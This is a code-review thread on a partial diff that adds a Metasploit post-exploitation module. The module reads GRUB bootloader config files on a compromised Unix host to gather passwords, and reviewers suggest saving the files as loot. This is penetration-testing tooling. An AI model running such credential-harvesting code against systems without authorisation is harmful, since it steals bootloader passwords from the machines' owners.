modules/post/multi/gather/grub_password.rb

```diff
@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => '*nix Gather Grub Password',
+      'Description'  => %q{
+        This module gathers grub passwords from grub bootloader config file.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Garvit Dewan <d.garvit[at]gmail.com>' # @dgarvit
+        ],
+      'Platform'     => ['linux', 'osx', 'unix', 'solaris', 'bsd'],
+      'SessionTypes' => ['meterpreter', 'shell'],
+      'References'   => [
+        ['URL', 'https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption']
+      ]
+    ))
+  end
+
+  def run
+    targets = [
+      '/boot/grub/grub.conf',
+      '/boot/grub/grub.cfg',
+      '/etc/grub.conf',
+      '/etc/grub/grub.cfg',
+      '/etc/grub.d/00_header',
+      '/mnt/sysimage/boot/grub.conf',
+      '/mnt/boot/grub/grub.conf',
+      '/rpool/boot/grub/grub.cfg'
+    ]
+
+    targets.each do |target|
+      if file? target
+        print_status("Reading #{target}")
+        file = read_file(target)
```

Comment:
Optionally, seeing as you're downloading the entire file anyway, it might be a good idea to save the file locally with `store_loot`.

Reply:
Definitely a good idea. Implemented it!

Reply:
The first paramater to `store_loot` is an `ltype`. Something like `grub.config` would be more appropriate.

```ruby
  #
  # Store some data stolen from a session as a file
  #
  # Also stores metadata about the file in the database when available
  # +ltype+ is an OID-style loot type, e.g. "cisco.ios.config".  Ignored when
  # no database is connected.
  #
  # +ctype+ is the Content-Type, e.g. "text/plain".  Affects the extension
  # the file will be saved with.
  #
  # +host+ can be an String address or a Session object
  #
  # +data+ is the actual contents of the file
  #
  # +filename+ and +info+ are only stored as metadata, and therefore both are
  # ignored if there is no database
  #
  def store_loot(ltype, ctype, host, data, filename=nil, info=nil, service=nil)
```

Reply:
Got it, thanks!